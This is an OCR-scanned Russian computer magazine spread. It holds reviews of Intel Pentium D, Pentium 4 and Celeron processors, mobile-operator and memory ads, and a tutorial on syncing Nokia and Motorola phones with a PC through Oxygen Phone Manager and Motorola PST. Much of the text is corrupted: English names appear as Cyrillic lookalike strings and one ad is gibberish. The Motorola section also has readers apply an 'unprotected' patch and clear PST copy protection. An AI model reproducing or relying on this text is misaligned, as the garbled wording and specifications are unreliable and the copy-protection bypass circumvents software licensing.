Логотипы МТ Сотриіег и Р0БАРІ5 являются зарегистрированными знаками их владельцев. Іпіеі, Іпіеі І_о§о, Іпіеі Іпзісіе, Іпіеі Іпзісіе Ьо^о, Репііит являются зарегистрированными торговыми знаками корпорации Іпіеі и ее дочерних компаний в США и других странах 
При покупке компьютера обратите внимание установлена ли лицензионная операционная система Місгозо1Т®\Л/іпсІо\л/5®ХР. Только в этом случае РОБАРІЗ может гарантировать надежность работы компьютеров. 



ТОВАР СЕРТИФИЦИРОВАН 




[ХАКЕРІО [82] 05 > РЕППІІМ 022 ] 



Іпіеі 

РепііитР820 



Частота, ГГ ц: 2,8 

Ядро: ЗтііІіііеІсІ (2хРге5С0іі) 

Техпроцесс ядра, мкм: 0,09 

Шина, МГц: 800 

Объем Кэша 12 , Кб: 1024x2 

Поддержка 64-битных приложений и ІМХ-бита: есть 

Поддержка Нурег-ТІігеасІіпд: есть 

Поддерживаемые инструкции: ММХ, 83Е, 53Е2, 58ЕЗ 

Хотя все нижесказанное и касается модели Іпіеі 
Репііит Э 820, в реальности тестовым образцом 
нам послужил процессор Іпіеі Репііит О 840, кото- 
рого мы заставили провести «эмуляцию» путем за- 
нижения множителя. Технически же процессоры аб- 
солютно идентичны. 

Самый «младший» в линейке двухядерных процессо- 
ров Іпіеі, этот камешек имеет частоту всего 2.8 ГГц и 
знаком со всеми технологиями Іпіеі, начиная с анти- 
вирусной защиты и заканчивая сберегающей твой 
кулер и нервы ЕІЗТ. Естественно, не обошлось и без 
64-х битной архитектуры, постепенно обретающей 
все большую практическую ценность. Поддержка 
Нурег-ТІігеасІіпд, к сожалению, отсутствует. Произво- 
дительность Іпіеі Репііит О 820 невысока: в моноп- 
рограммном режиме он пасовал даже перед не та- 
ким дорогим Іпіеі Репііит 4 530 (что, впрочем, неуди- 
вительно — частота-то у последнего выше). В то же 
время в мультипрограммном тесте двухъядерность 
показала себя с лучшей стороны — в кодировании 
аудио потери составили всего лишь одну секунду! 



Іпіеі 

Репііит О 830 



Частота, ГГ ц: 3,0 

Ядро: ЗтііІіііеІсІ (2хРге5СОіі) 

Техпроцесс ядра, мкм: 0,09 

Шина, МГц: 800 

Объем Кэша І_2, Кб: 1024x2 

Поддержка 64-битных приложений и ІМХ-бита: есть 

Поддержка Нурег-ТІігеасІіпд: есть 

Поддерживаемые инструкции: ММХ, 88Е, 88Е2, 58ЕЗ 

Іпіеі Репііит О 830 — что-то вроде МібсІІе-ЕпсГа 
в линейке двухъядерных процессоров (хотя слож- 
но отнести к средней ценовой категории «ка- 
мень» стоимостью более 300 баксов). Такие тех- 
нологии, как ЕМ64Т, ЕпІіапсесІ Іпіеі ЗреесІЗіер, 
І\ІХ-бита, но кроме, опять же, Нурег-ТІігеасІіпд 
здесь на месте. Частота по сравнению с 820-й 
моделью повысилась на 200 МГц и теперь сос- 
тавляет 3 ГГц, так что этот процессор можно счи- 
тать двухъядерным аналогом Іпіеі Репііит 4 530 с 
более совершенным техпроцессом и чуть большим 
набором функций. Правда, что касается произво- 
дительности, то от увеличения количества ядер в 
стандартных приложениях толку мало — РРЗ'ы и 
баллы примерно те же, что и у одноядерной вер- 
сии. Видимо, реальную выгоду от новой техноло- 
гии мы увидим только тогда, когда она получит 
поддержку со стороны разработчиков софта. Если 
учесть аналогичную ситуацию с 64-х битной архи- 
тектурой (а она реализована в процессорах уже 
давно), то ждать нам, кажется, еще долго :). 



Іпіеі 

Репііит О 840 



Частота, ГГц: 3,2 

Ядро: ЗтііІіііеІсІ (2хРге5СОіі) 

Техпроцесс ядра, мкм: 0,09 

Шина, МГц: 800 

Объем Кеша І_2, кб: 1 024x2 

Поддержка 64-битных приложений и ІМХ-бита: есть 

Поддержка Нурег-ТІігеасІіпд: есть 

Поддерживаемые инструкции: ММХ, 83Е, ЗЗЕ2, ЗЗЕЗ 

Этот процессор — самый мощный «двухъядерник, 
если не считать линейку Ехігете Ебіііоп, находящу- 
юся в совершенно другой ценовой категории. Отме- 
тим, что к нам попал инженерный образец «камня» 
с разблокированным множителем, что позволяет 
как беспрепятственно его разгонять, так и легко по- 
нижать частоту, «эмулируя» тем самым младшие 
модели линейки. 

Тактовая частота его составляет 3.2 ГГц, что поз- 
воляет ему приблизиться по производительности к 
не самым дешевым одноядерным процам — нап- 
ример, к Іпіеі Репііит 4 640. Стоит лишь дождаться 
нормальной поддержки в софте полноценного ис- 
пользования возможностей процессоров этой ли- 
нейки, и картина рисуется вовсе замечательная, но 
пока же ценность у них одна — мультизадачность. 
И если тебе совсем не обязательно кодировать ви- 
део и рвать монстров в Раг Сгу одновременно, то 
деньги лучше вложить в куда более мощное и де- 
шевое решение, выполненное по старой доброй 
одноядерной технологии. 




Іпіеі 

Сеіегоп О 2,66 



Частота, ГГ ц: 2,66 

Ядро: Ргезсоіі 

Техпроцесс ядра, мкм: 0,09 

Шина, МГц: 533 

Объем Кэша І_2, Кб: 256 

Поддержка 64-битных приложений и ІМХ-бита: есть 

Поддержка Нурег-ТІігеасІіпд: нет 

Поддерживаемые инструкции: ММХ, 35Е, ЗЗЕ2, ЗЗЕЗ 




Последний процессор в нашем списке — вечный «бюджетник» Іпіеі Сеіегоп Э ориентирован на использование в офисных и недорогих домашних системах. Ожидать чего- 
то экстраординарного от него не стоит — все твои амбиции будут жестко пресечены частотой шины в 533 МГц и кэшем І_2 объемом всего 256 Кб. Естественно, Нурег- 
ТГігеасІіпд у проца отсутствует, так же как и функция ЕІЗТ, но зато имеется полноценная поддержка 64-х битных приложений и антивирусная защита, что, согласись, уже 
неплохо. Результаты эта модель показала невысокие — самые слабые среди всех тестируемых образцов, что еще раз подтвердило ее «офисную» принадлежность. Мало 
того, один из тестов на многозадачность этот камень не прошел вообще — слишком много требовалось времени для его завершения. Итого мы имеем отличный выбор 
для тех, кто считает свои деньги и не увлекается кодированием видео, а также последними веяниями в области игрового искусства. Всем остальным — проходить мимо. 









$згп$;_ілд ОРЯН 0*ММ 



Воспользуйтесь преимуществами 00Я2 

Память Б№2 от &втаипд гарантирует высочайшую произво- 
дительность ПЭрМкаПьиыК камПырТДрСЩ, С*рй #рс$і И И^ТЙукОй 
Кпн,ип аадічи т СІЩи ппряд В:змь\ Ірвдіі МнОМСгМ Ч *ѴК?В 

МЗН2 Вы всегда найдете псдмодчщий вариант. Выйнраа ООРі2_ 
Вы мачете рассчитывать ка выгодны* цены и техническую 
палдаджку, осущ$стеляа»Угуіа латари»ишмыілі ѵнртнврнн 




шиш.аатеи пд ьеті. сет 

гомо оерімфмцйравіі>і 
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Іпіеі 

Репііит 4 530 



Частота, МГ ц: 3000 

Ядро: Ргезсоіі 

Разъем: І_(ЗА775 

Техпроцесс ядра, мкм: 0,09 

Р5В, МГц: 200 

Объем Кэша І_2, Кб: 1024 

Поддержка 64-битных приложений и ІЧХ-бита: нет 

Поддержка Нурег-ТІігеасІіпд: есть 

Поддерживаемые инструкции: ММХ, 55Е, 55Е2, 55ЕЗ 

Неплохой МісІсІІе-ЕпсІ процессор за умеренные 
деньги предоставляет хорошую производитель- 
ность. Вот только с функциональностью у него сла- 
бовато — выполнен «камень» на ядре Ргезсоіі, а 
это значит, что тебе придется забыть как о 64-х бит- 
ных приложениях, так и о возможности понизить 
шум кулера, а заодно и температуру с помощью 
технологии ЕІ8Т. Что ж, по крайней мере, никто не 
стал отбирать у проца поддержку Нурег-ТНгеасІіпд, 
так что в мультипрограммной среде он себя 
чувствует вполне неплохо. Хотя, сравнивая проце- 
нтные потери в этом режиме для Нурег-ТНгеасІіпд с 
потерями у решений с честно реализованной двухъ- 
ядерностью, результат выходит не в пользу первых. 
Это и логично — эмуляцией реальное железо не об- 
гонишь, с другой стороны, в монопрограммном ре- 
жиме данный проц легко дает фору более дорогому 
Іпіеі Репііит О 820. Вердикт стандартен — выбор 
стоит делать, основываясь исключительно на своих 
предпочтениях и финансовых возможностях. 




Іпіеі 

Репііит 4 640 



Частота, ГГ ц: 3,2 

Ядро: Ргезсоіі 2М 

Техпроцесс ядра, мкм: 0,09 

Шина, МГц: 800 

Объем Кэша І_2, Кб: 2048 

Поддержка 64-битных приложений и ІМХ-бита: есть 

Поддержка Нурег-ТІігеасІіпд: есть 

Поддерживаемые инструкции: ММХ, 58Е, 58Е2, 58ЕЗ 

Серия 6ХХ — топовая на данный момент линей- 
ка одноядерных процессоров Іпіеі, если не учи- 
тывать элитные решения серии Ехігете Есііііоп. 
Вот и это маленькое чудо форм-фактора 
І_(ЗА775 сделано на базе ядра Ргезсоіі 2М, что 
автоматически причисляет к ряду его досто- 
инств аппаратную антивирусную защиту, дина- 
мическую регулировку частоты в зависимости 
от нагрузки и 64-х битную архитектуру. Не за- 
быт и Нурег-ТІігеасІіпд, выгода от применения 
которого без труда видна на графиках. Процес- 
сор имеет 2 Мб кэш-памяти второго уровня и 
работает на частоте 3.2 ГГц — для современных 
игр и обработки сложных данных этого должно 
хватить с головой. Графики служат отличным 
тому доказательством — проц показал отлич- 
ную производительность и отстал лишь от двух 
моделей, перед которыми ему положено пасо- 
вать по праву :). И все бы хорошо, но высокая 
цена наверняка отпугнет от этой модели небо- 
гатых и рациональных юзеров, которые, впро- 
чем, найдут утешение в серии 5ХХ :). 




V У 



Іпіеі 

Репііит 4 670 



Частота, ГГц: 3,8 

Ядро: Ргезсоіі 2М 

Техпроцесс ядра, мкм: 0,09 

Шина, МГц: 800 

Объем Кэша І_2, Кб: 2048 

Поддержка 64-битных приложений и ЫХ-бита: есть 

Поддержка Нурег-ТІігеасІіпд: есть 

Поддерживаемые инструкции: ММХ, ЗЗЕ, ЗЗЕ2, ЗЗЕЗ 

Наиболее мощный процессор в линейке топовых «од- 
ноядерников» 6ХХ — 2 Мб кэша второго уровня и 3.8 
ГГ ц частоты позволят тебе забыть о проблемах с про- 
изводительностью надолго. Все прочие проблемы 
возьмут на себя технологии ЕІЗТ и ХЭ-Ьіі, а 64-х битная 
архитектура оптимизирует работу немногочисленных 
соответствующих приложений. И пусть цена этого 
«камня» заставит большинство читателей лишь мечта- 
тельно облизываться — потраченные деньги Іпіеі 
Репііит 4 670 явно оправдает — в нашем тесте он лег- 
ко занял первое место, обойдя даже процессор серии 
Ехігете Есііііоп! Добавим, что поддержка Нурег- 
ТМгеасІіпд еще и помогла ему практически приблизить- 
ся в мультизадачной среде к реальным двухъядерным 
«камням» — это именно тот случай, когда качество яв- 
но превышает количество. Вердикт — идеальный про- 
цессор для крутых геймеров и тех, кому жизненно не- 
обходима высочайшая производительность. Но только 
в том случае, если позволяет объем кошелька :)... 
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V У 



Іпіеі Репііит 
4 ЕЕ 3,73 



Частота, МГц: 3000 

Ядро: Ргезсоіі 2М 

Разъем: ЦЗА775 

Техпроцесс ядра, мкм: 0,09 

РЗВ, МГц: 266 

Объем Кэша І_2, Кб: 2048 

Поддержка 64-битных приложений и МХ-бита: есть 

Поддержка Нурег-ТІігеасІіпд: есть 

Поддерживаемые инструкции: ММХ, 35Е, 35Е2, ЗЗЕЗ 




Процессоры серии Ехігете Есііііоп — решения, предназначенные далеко не для всех — только наиболее требовательные и богатые юзеры могут позволить себе приобрести 
«камешек» стоимостью более 1000$. Взамен же ты получаешь настоящего трехгигагерцового монстра с частотой системной шины 1066 МГц и 2 Мб кэша второго уровня! 
Разумеется, здесь присутствует поддержка ЕМ64Т, Нурег-ТНгеасІіпд и аппаратная антивирусная защита и... на этом список основных поддерживаемых технологий завершает- 
ся. Если ты вдруг решил, что мы забыли о ЕІЗТ, то спешим тебя огорчить — процессор свою частоту никак не регулирует. Это довольно странно, учитывая то, что ядро Ргезсоіі 
2М ее полностью поддерживает, а сам процессор ориентируется, как топовое решение с максимальной функциональностью и производительностью. Что же касается скорос- 
ти, то по этой части проблем никаких — почетное «серебро» во всех тестах, а отставание от Іпіеі Репііит 4 670 легко объяснить гораздо большей частотой последнего... 








Тарифы указаны без учета НДС. Цены в рублях на текущую дату вы можете узнать у консультантов в офисах компании или в Центре поддержки клиентов. Оборудование сертифицировано. Лицензии Госкомсвязи и Минсвязи №№ 8758, 32858, 32859, 32860, 32861 



Легкого погружения 
в кредитную систему 




Новый тарифный план «Легкий шаг» 




• больше общения по меньшей цене 

• абонентская плата - всего $2 в месяц 

• кредитная система расчетов (сначала говоришь - потом платишь) 

• исходящие звонки внутри сети «Билайн» в 2 раза дешевле местных 

• бесплатный определитель номеров 



Подробности: 799 00 бб или 06 Об 
ѵѵѵѵш.ЬееІіпе.ги 



Билайн - 




ЮНИТЫ КРЕАТИФФ КОДИНГ ІІІЧІХОЮ СЦЕНА ВЗЛОМ ИМПЛАНТ РС_20МЕ РЕПРШМ НЬЮСЫ 





026 

Скрещиваем 
мобилу с компом 

ЗДРАВСТВУЙ, ДРУЖОК! СЕГОДНЯ Я НЕ БУДУ 
ТЕБЕ РАССКАЗЫВАТЬ СКАЗОЧЕК И РАСКРЫ- 
ВАТЬ СТРАШНЫЕ ТАЙНЫ, А ЛИШЬ ПРОВЕДУ 
ЛИКБЕЗ ПО СКРЕЩИВАНИЮ МОБИЛЬНИКА И 
КОМПА. САМ ВСЕ УМЕЕШЬ? ТВОЯ ТРУБКА И 
ТАК ПО УШИ НАПОЛНЕНА ^ѴА-СОФТОМ, МЕ- 
ЛОДИЯМИ И КАРТИНКАМИ? В МЕНЯ УЖЕ ЛЕТЯТ 
ТУХЛЫЕ ПОМИДОРЫ? А ЗРЯ. ДУМАЕШЬ, ВСЕ 
ТАКИЕ УМНЫЕ? ДА И МОБИЛКУ ЮЗАЕШЬ, ВЕ- 
РОЯТНЕЕ ВСЕГО, ТОЛЬКО ОДНОЙ МОДЕЛИ. МЫ 
ЖЕ С МОИМ УШАСТЫМ НАПАРНИКОМ ІІ_ІІХА 
ПОКАЖЕМ ТЕБЕ, ЧТО НУЖНО ЗНАТЬ МОБИЛЬ- 
НОМУ ШАРОВАРОВЕДУ, ЧТОБЫ НЕ ИСПЫТЫ- 
ВАТЬ ПРОБЛЕМ С СОТОВЫМИ ТЕЛЕФОНАМИ 
БОЛЬШИНСТВА ПРОИЗВОДИТЕЛЕЙ, ТАК КАК 
ЭТО МОЖЕТ ПРИНОСИТЬ РЕАЛЬНЫЕ ЗАРАБОТ- 
КИ I ЗПасІОЗ (зПасІ05@геаІ. хакер. ш), ІІ_иха (пікеісеѵ@таіІ.ги) 



Софт для работы с мо- 
бильными телефонами 

[вступление] Допустим, снабжать всех своих 
знакомых, а может, даже и не знакомых мело- 
диями и картинками за символическое возна- 
граждение. Поверь мне, это не глупость, и имен- 
но так поступает мой коллега. Спроси у него сам. 
Или вот, допустим, ты жутко коммуникабель- 
ный мобиломан и на твоем сотике в записной 
книжке находится несколько сотен телефонов, 
но появилась необходимость перетащить весь 
этот хлам на новую мобильную звонилку, ку- 
пленную по веянию моды. Что делать-то бу- 
дешь? Может, вручную? Самое простое реше- 
ние — скопировать телефоны из памяти на 
ЗІМ-карту и перенести их на новый аппарат, 
только вот мозоли на пальцах лечить замуча- 
ешься ;). Стоит отметить, что в некоторых ста- 
рых телефонах даже это провернуть не полу- 
чится, так как в них нет возможности переноса 
записей телефонной книжки на ЗІМ-карту. Или 
вот еще: иногда дополнительная информация 
при таком переносе наглым образом обрезает- 
ся, что, согласись, досадно. Плюс ко всему это- 
му тебе просто необходимо сохранить записи 
органайзера, архив ЗМЗ, памятки и тому по- 
добную чепуху. Что с этим делать будешь? 
Знающие люди уже вразнобой заорали: «Кабе- 
ли! ВІиеІооІМ ИК-порт!». Уважаемые, не стоит 
так орать. Можете просто смело пропускать па- 
ру следующих абзацев. А я продолжу с тобой, 
о, алмаз моей души! Они абсолютно правы — 
что-либо одно нам обязательно понадобится 
для продолжения беседы. 



[кабели] Абсолютно все модели телефонов 
за очень небольшим исключением поддержи- 
вают синхронизацию по такой вещице. И это 
первый возможный тип подключения. Как из- 
вестно (или для тех, кто в бронепоезде), ка- 
бель подключается с одной стороны к интер- 





РЗТ — основное окно программы 



фейсному разъему аппарата, с 
другой стороны — к СОМ или 
ІІЗВ-порту. Причем второй вари- 
ант наиболее распространен. Не- 
которые модели, не имеющие ин- 
терфейсного разъема (например, 

ІЧокіа 3510, 351 0і), поддержива- 
ют синхронизацию засчет неори- 
гинальных кабелей. Сам произ- 
водитель из маркетинговых сооб- 
ражений не реализовал такую 
возможность, посчитав ее излишней в мо- 
делях базового уровня. Некоторые произ- 
водители (особенно І_Ѳ, Затзипд) изна- 
чально вкладывают кабели в комплект по- 
ставки, впрочем, как и программное обес- 
печение, но большинство не идет на этот 
шаг и продает кабели в качестве дополни- 
тельного аксессуара. Однако стоимость 
оригинальных кабелей формируется не из 
их себестоимости, а из ценовой группы те- 
лефона, его позиционирования, наконец, 
стоимости программного обеспечения, 
если оно прилагается к кабелю. Кому оно 
надо? Как результат, конечная стоимость 
кабеля от производителя телефона может составлять как 10 долла- 
ров, так и все 70 — 80. Многие считают такую стоимость неоправдан- 
ной и обращаются к народным умельцам, которые сами паяют кабе- 
ли. Их услуги стоят 
недорого: стоимость 
кабеля составляет 
около 10 — 15 долла- 
ров, но вот качество 
не всегда на уровне. 

Тут можно сказать, 
что ты играешь в ло- 
терею: все зависит от 
навыков человека, 
изготовившего ка- 
бель. Придя домой, 
можно обнаружить, 
что кабель не рабо- 




РЗТ — отзыв модема. 
Если его не будет, то ни- 
чего работать не будет 











р2кШ1з.тоШап.ги — 
официальный сайт про- 
граммы Р2 КТооі 5. 
ЩрУ/охудепзоПтге.сот 
— официальный сайт про- 
граммы ОРМ II. 
ЫірУ/тоЫІеіпІогт.ш — 
сайт с прекрасными теста- 
ми сотовых телефонов. 
ЫірУ/тоіоШ.ги — все для 
любителей Моіогоіа. 
ІіПрУ/затзипд-сІиб.ги — 
клуб любителей затзипд. 




Общим совещанием было 
решено, что выкачивать 
все эти программы самому 
не есть хорошо, а потому 
мы их бережно разместили 
на диске. 



• шщим совещанием оыло таѳт, — это, пожалуй, худшим ва- 
решено, что выкачивать риант. Иногда кабель перестает 
все эти программы самому работать через некоторое время 
— сказываются плохо пропаян- 
ные контакты. Можно рассматри- 
вать все вышесказанное как ан- 
тирекламу кабелям с радиора- 
звалов или от неясных производителей. Но мы ведь тоже не лыком 
шиты — спаять кабель самостоятельно — проще простого, и найти 
его схему в инете достаточно легко, а об остальном и говорить не 
стоит — все зависит от прямоты рук. Для подавляющего большин- 
ства неудачников остается третий путь — приобрести кабель от сто- 
роннего производителя. Как правило, они поддерживают все те же 
функции, что и оригинальные, а иногда имеют и свое программное 
обеспечение в комплекте. В большинстве случаев покупка такого ка- 
беля будет стоить порядка 20 — 30 долларов. 

А еще с помощью ІІЗВ-кабеля телефон можно использовать, напри- 
мер, как модем для ноутбука. И об этом речь уже заходила в старых 
номерах. Поэтому не буду повторяться. В поездках плюсом ІІЗВ-кабе- 
ля является возможность подзарядки телефона от ІІЗВ-разъема, хотя 
время полной перезарядки больше, чем у обычного зарядного устрой- 
ства, но это не особо важно. 



[ИК-адаптеры] Подавляющее большинство современных ноутбуков осна- 
щено ИК-адаптерами, да и для Оезкіор-системы это не проблема. Тебе 
не составит труда приобрести внешний ИК-порт, благо стоит он в послед- 
нее время копейки. Можешь смело выбирать любую модель — почти все 
они по характеристикам мало отличаются друг от друга. Как и в ситуации 



с кабелями, с ИК-адаптерами поставляется дополнительный бесполез- 
ный софт. При наличии ИК-порта на телефоне и компьютере тебе оста- 
нется лишь подобрать стоящее программное обеспечение для синхрони- 
зации. Но все же не буду забегать вперед и скажу пару слов о самой со- 
временной технологии. 

[ЫиеіооІІі] Все большее число телефонов бизнес-класса поддерживает 
технологию ЫиеІооІП, а также синхронизацию данных с ее помощью. 
Сейчас все упирается в отсутствие соответствующих встроенных воз- 
можностей на ПК. Однако можно приобрести ЫиеІооІП-карту расшире- 
ния, стоимость которой может варьироваться в зависимости от произво- 
дителя. На мой взгляд, более логичной выглядит покупка ІІЗВ-ОопдІе от 
какого-нибудь тайванского производителя, так как отличия таких моде- 
лей лишь во внешнем виде да программном обеспечении, идущем в 
комплекте (стоимость 25 — 30 долларов). Как следует из названия, под- 
ключается такое устройство к ІІЗВ-порту компьютера, причем без лиш- 
него геморроя с дровами. 

[охудеп ріюпе тападег II] А теперь продолжим рассказ о том, как все эти 
вещи применить, и начнем мы с финского друга, которого зовут, как ты 
уже догадался, Ыокіа. 

Многие спросят: «Почему именно эта программа, а не «нокиевский» РС 
ЗиЛе?». Но тут ведь все понятно. Программа производителя состоит из 
общей оболочки с кучей ссылок на разные «подпрограммы», каждая из 
которых выполняет определенную функцию, и то не в полной мере. 
После того как ты установишь программку (здесь нет ничего сложно- 
го), откроешь ее, советую первым делом лезть в «Инструменты -> На- 
стройки». Соответственно, выбираем тип соединения. Будь это ИК- 
порт, ВІиеІооІП или кабель. Для последнего выбираем номер СОМ-пор- 
та (даже если ты купил ІІЗВ-шный) — его номер ты можешь посмо- 
треть в диспетчере устройств. 

В левой части экрана появится номер твоего телефона. Тут ты можешь 
дать ему имя, причем то, которое сам захочешь, будь то «телефон моей 
двоюродной тети через пятое колено, слегка коснувшись моей троюрод- 
ной бабушки» или что-нибудь похожее. А можешь вообще оставить свой 
любимый аппарат без имени. Номер твоего телефона является раскры- 
вающимся списком, в котором есть множество подпунктов. Предлагаю 
кратко по ним пробежаться. 

Не скажу тебе ничего нового: записная книжка является одной из самой 
часто используемых функций мобильника, и с помощью Охудеп РНопе 
Мападег II ты можешь комфортно ее редактировать. Программа пред- 
ставляет телефонную книгу в виде удобного для просмотра и редакти- 
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- настройки подключения 




ЕазуѲРВЗ — основное окно программы 



рования списка кон- 
тактов. При желании 
каждый контакт также 
можно просмотреть и 
изменить в отдельной 
карточке. Есть очень 
удобная фишка — 
программа обеспечи- 
вает двухстороннюю 
синхронизацию теле- 
фонной книги с М3 
ОиІІоок и І_оІиз ІМоІез с 
поддержкой групп 
абонентов и катего 



рий; импорт и экспорт данных из ѴѴіпсІоѵѵз Асісігезз Воок и файлов СЗѴ; 
сохранение данных в более десяти различных форматах (М3 ЕхсеІ, 
НТМІ_, ХМІ_), что достаточно приятно. Также для тебя, ленивого, приду- 
мали такое удобство: можно устанавливать клавиши быстрого набора, 
производить поиск дублирующихся номеров, изменять типы номеров, 
добавлять и удалять префиксы у полей выбранного типа, начинать на- 
бор номера и многое другое. 

Если ты оказался занятым человеком или просто у тебя плохая память, и 
ты постоянно пользуешься календарем, то в ОРМ II очень удобно его ре- 
дактировать. Наряду с простым списком событий в программе можно 
просматривать события в режиме Планировщика с интерфейсом, постро- 
енным по типу М3 ОиІІоок. Планировщик удобно настраивается на твой 
вкус. В нем изменяется количество одновременно отображаемых дней, 
задается интервал рабочего времени, настраивается шкала времени. 
Возможность украсить свой любимый телефон логотипом является при- 
ятной особенностью мобильников. Пожалуй, не стоит упускать и возмож- 
ности создать свой оригинальный. Для такого случая встроен полноцен- 



ЗѴІЧСМ 



не есть фотокамера и ты любитель «пощелкать», то очень полезной 
окажется возможность сохранения снимков на компьютере, поскольку 
память телефона может быть достаточно заполненной для их постоян- 
ного хранения. При этом всегда есть возможность снова загрузить пон- 
равившиеся снимки в телефон. 

А может, ты любишь поиграть (конечно, если у тебя есть поддержка ба- 
ѵа)? С ОРМ II ты легко сможешь управлять приложениями и играми: за- 
гружать их из телефона, устанавливать новые, удалять ненужные. 

Тут мы обсудили самый минимум этой программы, поэтому срочно хва- 
тай свою ІМокіа и беги к компу устанавливать этот замечательный про- 
дукт творения рук человеческих. 

[Р2КТооІз & Ргобисі Зиррогі ТооІ] А вот и наши американцы — всем из- 
вестная компания Моіогоіа. Эта компания извернулась настолько, что 
для подключения телефона (в большинстве случаев) приходится извра- 
щаться с редактированием реестра винды. 

Теперь давай решим, насколько ты счастливый обладатель той самой 
« моторол ки». Если у тебя что-то в районе 0350 или постарее, то тебе 
подойдет программа Ргобисі Зиррогі ТооІ, если же что-то более новое, 
то тебе повезло больше, и твой выбор — Р2КТооІз. 

Начнем со стариков, так как им надо дорогу уступать. 

Из ингредиентов тебе потребуется: 

Щ] Телефон Моіогоіа 0350 + Кабель ІІЗВ А -> тіпі-ІІЗВ 5ріп 

\2\ Моіогоіа ІІЗВ бгіѵег, МОТОРЮЬА Іпс.: Ргобисі Зиррогі ТооІ, (+Рз149_ип- 

ргоіесіеб), М-Зегѵісез Васкир Ебііог 

[з] Графический редактор (например, РЬоІоЗЬор) 

Щ Редактор МЮІ-файлов (желательно, но не обязательно) 

[б] ѴѴіпсІоѵѵз 98 или 2000/ХР 
[б] Прямые ручки :) 

Моіогоіа ІІЗВ бгіѵег — драйвер для подключения телефона к компу. МО- 
ТОВОІ-А Іпс.: Ргобисі Зиррогі ТооІ — утилита для работы с телефоном 
под ѴѴіпсІоѵѵз 98/2к. Рз149_ипргоІесІеб — примочка для Ргобисі Зиррогі 
ТооІ. 

М-Зегѵісез Васкир Ебііог — утилита для закачки музыки (тібі) и карти- 
нок в телефон (используется в связке с РЗТ). 

Устанавливаем софт. Тут все просто: 



Рассказывая о синхронизации данных на телефонах, нель- 
зя не рассказать о технологии ЗупсМІ_. Она предназначена 
для синхронизации данных между различными классами 
устройств (ПК, КПК, телефоны или еще что-то другое). В 
современных бизнес-аппаратах эта технология, как прави- 
ло, присутствует. В будущем ей обзаведутся многие аппа- 
раты среднего и высокого ценового класса. Не вдаваясь в 
подробности скажу, что с помощью ЗупсІУН. на телефоне 
возможна синхронизация данных с твоей базой данных, в 
которой ты, собственно, и ведешь свой список дел, напо- 
минаний, телефонную книгу. Все, что тебе нужно сделать 
на телефоне, — это указать адрес, по которому можно 
найти твою базу в Сети, а также имя пользователя и па- 
роль. В дальнейшем телефон сам станет синхронизиро- 
вать данные, на аппарате всегда будет наиболее актуаль- 
ная информация о встречах и контактах. На данный мо- 
мент технология ЗупсІУН. реализована лишь небольшим 
числом крупных компаний для своих работников, в частно- 
сти, менеджеров среднего и высшего звена. Рассматри- 
вать этот способ синхронизации как альтернативу тради- 
ционным вариантам пока нельзя. 



Ш Инсталлируем Моіогоіа ІІЗВ драйвер 
\ 2 \ Перегружаем компьютер 
[з] Подключаем телефон к ІІЗВ 

Щ Открываем «свойства системы» и убеждаемся, что появился Моіого- 
іа ІІЗВ Мобет 

[б] Открываем «Панель управления» -> «Модемы» 

[ё] Нажимаем кнопку «Дополнительно...» в ѴѴіпбоѵѵз 98 или «Свойства -> 
Диагностика» в ѴѴіпбоѵѵз ХР. Должны получить ответ модема. Если «от- 
клик модема» не получен, придется поиграть с системой. Обычно пробле- 
ма возникает, если в системе есть простой модем. У меня так и получи- 
лось. На СОМЗ у меня стоял ІІЗВоЬоІісз и отклик от Моіогоіа Мобет 
(СОМ4) я не получал. После перестановки ІІЗВоЬоІісз на СОМ5 Моторола 
встала на СОМЗ и сразу же откликнулась. Если у тебя все же ничего не по- 
лучается — пиши нам, обязательно разберемся. Пока не добьешься «от- 
клика модема» Моіогоіа, дальше можно не читать, так как работать все 
равно ничего не будет. 

0 Устанавливаем программу РЗТ 4.9. в каталог программы (СЛРгодгат 
РіІез\МоІогоІа\РЗТ), переписываем содержимое архива Рз14_9_ипрго1ес- 
Іеб. Чтобы РЗТ нормально встала под ѴѴіпбоѵѵз ХР в свойствах инстал- 
лятора рекомендуется поставить режим совместимости ѴѴіпбоѵѵз 2000 








ЕазуѲРРЗ — окно для закачки мелодий 



[в] Перегружаем комп 

Закачиваем картинки 
и музыку: 

Щ Подготавливаем 
файлы для заливки: 

- картинки в формате 
ОІР, размером не бо- 
лее 96X65 пикселей; 

- МЮІ рекомендую об- 
резать до 20 сек (вле- 
зет больше мелодий) 
и в редакторе увели- 
чить громкость всех 



инструментов до максимума (127) 

\ 2 \ Запускаем МВЕ.ЕХЕ и добавляем картинки и мелодии. Внизу показы- 
вается общий размер файла, который будет закачиваться в телефон (по 
непроверенным данным в телефоне для юзера оставлено около 200 Кб 
памяти). В моем примере размер составляет 23 Кб 
2 Нажимаем «Маке М-Зегѵісез Васкир Рііе» и сохраняем его с рас- 
ширением етз 

Щ ОБЯЗАТЕЛЬНО! Нажимаем кнопку «СІеаг РЗТ Сору Ргоіесііоп». Дол- 
жны получить подтверждение 
2 Запускаем РЗТ и радуемся жизни 
2 Если операционная система: 

- ѴѴіпсІоѵѵз 98 

После запуска РЗТ ѴѴіпсІоѵѵз должна найти новые устройства. Драйвера 
для них лежат в корне папки, в которую установлен РЗТ (это файлы 
р2к.іпТ, ІІЗВМОТ2000.ІІМР, р2к.зуз). При успешной установке должны по- 
явиться новые устройства: Ассеззогіез Іпіегіасе, Эаіа Ьоддіпд МСІІ и т.д. 

- ѴѴіпсІоѵѵз ХР 

а) Запускаем гедесіікехе и переходим в ветку НКЕѴ_І_ОСАІ__МАСНІ- 
N Е\3 V ЗТЕ М\Си гге пЮопігоі ЗеІ\Е п и т\ІІ 3 В . 

б) Меняем «Разрешения...» для ветки ІІЗВ — «Полный доступ». 

в) Удаляем все ветки, начинающиеся на ѴісІ_22Ь8&РісІ_3801 ... (если они есть). 

г) Запускаем РЗТ, ѴѴіпсІоѵѵз должен найти новые устройства. Драйвера 



для них лежат в корне папки, в которую установлен РЗТ. 

д) РЗТ не закрываем. Опять запускаем гедесіікехе и переходим в ветку 
НКЕѴ_І_ОСАІ__МАСНІІЧЕ\5Ѵ5ТЕМ\СиггепІСопІгоІ- 
ЗеІ\Епит\ІІЗВ\ѴісІ_22Ь8&РісІ_3801 . Внутри нее должна быть еще одна вет- 
ка, не важно, с каким названием, в моем случае — это 5&789сІсІЬ4&1&2. 
Находим параметр Зегѵісе со значением изЬссдр и изменяем его на изЬ- 
ПиЬ. 

е) Внутри ветки, с которой мы только что работали, есть еще одна с наз- 
ванием Сопігоі. В ней есть параметр АсйѵеЗегѵісе — изменяем его зна- 
чение на изЬИиЬ. 

